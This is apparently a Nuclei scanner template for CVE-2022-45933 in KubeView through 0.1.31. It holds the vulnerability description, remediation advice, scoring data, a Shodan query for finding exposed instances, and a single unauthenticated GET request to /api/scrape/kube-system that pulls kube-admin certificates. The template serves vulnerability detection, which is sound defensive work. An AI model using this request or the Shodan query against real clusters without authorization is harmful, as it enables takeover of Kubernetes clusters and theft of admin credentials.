id: CVE-2022-45933 info: name: KubeView <=0.1.31 - Information Disclosure author: For3stCo1d severity: critical description: | KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: | Upgrade KubeView to a version higher than 0.1.31 to mitigate the information disclosure vulnerability (CVE-2022-45933). reference: - https://github.com/benc-uk/kubeview/issues/95 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933 - https://nvd.nist.gov/vuln/detail/CVE-2022-45933 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45933 cwe-id: CWE-306 epss-score: 0.00753 epss-percentile: 0.78916 cpe: cpe:2.3:a:kubeview_project:kubeview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: kubeview_project product: kubeview shodan-query: http.title:"KubeView" tags: cve,cve2022,kubeview,kubernetes,exposure,kubeview_project http: - method: GET path: - "{{BaseURL}}/api/scrape/kube-system" matchers-condition: and matchers: - type: word part: body words: - 'BEGIN CERTIFICATE' - 'END CERTIFICATE' - 'kubernetes.io' condition: and - type: status status: - 200 # digest: 4a0a00473045022100b46babd86c9ee28e80f77053f83de9f33c4578d02af393a680c2ed3472446f0d0220486f0a68f2297c03355819db04e0475d65347ce477808fcd87a80f018f77bade:922c64590222798bb761d5b6d8e72950